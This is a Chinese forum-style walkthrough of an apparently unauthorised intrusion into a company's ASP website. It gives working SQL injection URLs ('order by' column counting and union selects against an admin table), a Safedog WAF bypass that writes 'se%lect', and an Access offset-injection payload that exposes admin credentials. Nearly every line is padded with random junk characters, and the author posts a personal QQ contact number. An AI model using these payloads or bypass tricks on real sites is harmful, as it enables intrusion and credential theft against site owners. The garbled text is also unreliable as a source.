打开网站,一个企业站。
9 f9 R0 Z5 a& X7 c
' w/ {3 R5 m! d; a3 \8 e4 b! O! V/ ~
顺手加个admin8 u; C1 _5 m. l" s
+ Y% N0 F( X3 N- C' |8 N4 J j5 v* f- U2 f2 h
默认后台。
5 \8 l6 b- F1 o回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。$ Y0 z& {7 Z2 z# B3 o% X# F
! ^1 c' T) q& K( Z# D4 h4 `
0 C1 U# l0 a4 u" @" v; V! h% w% ?9 i/ T
所以就不用御剑扫了,待会直接封IP。
0 ], p) n6 h/ O$ Z 3 c% z$ {3 V& L% e% @
用order by语句判断是否存在注入。* v1 \( U: s! j% l/ K" P
http://www.xxx.com /product_show.asp?id=997 order by 1
- l" J4 C& f8 J0 G0 N4 S9 ahttp://www.xxx.com /product_show.asp?id=997 order by 100- ?) r- d% f) r6 Q# g- y% C) q
现在存在注入,经测试后发现是9个字段。
- _* Q% j8 B4 _8 y) g2 x3 `
9 H8 [6 {+ V5 P1 [$ r3 a& D5 z接下来进行联合查询,猜是否存在admin表。' @2 k$ E+ m' c$ S0 b7 U
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。8 J6 O) ^. [8 x* E7 M/ i
3 T$ O+ a4 Z! }& Q2 E v8 J
4 @9 n) l3 C* `( m; u4 q
2 [- `. S& w( ~4 V在select中间加个%,se%lect绕过安全狗。
- H- }' F. d: s5 z3 j5 ]- b& ]4 Y) E' p' ?, J% S; s
- N; y$ w# S& i6 z7 @发现存在admin表,然后开始手工猜常用的字段。- h( g& J3 T5 G" Y" z( a& \) y5 @
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。( |! V( ]% @- r+ J* C i! ~
& N2 y z8 b7 t/ F突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。3 m; K [/ ~7 Z2 Q. g
3 s G. n4 I P+ U5 w
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
" A' v a& F v1 s5 f7 E2 rhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
) _) f, H- n: v, [5 s$ y. x好了,敏感内容出显了。
9 t$ O D7 f) }4 d" {5 r- _6 m1 k: H- [+ K0 t% d
. k( l+ Q/ p- O0 _& n6 P( B! Y
4 j1 D2 s3 }8 f$ T |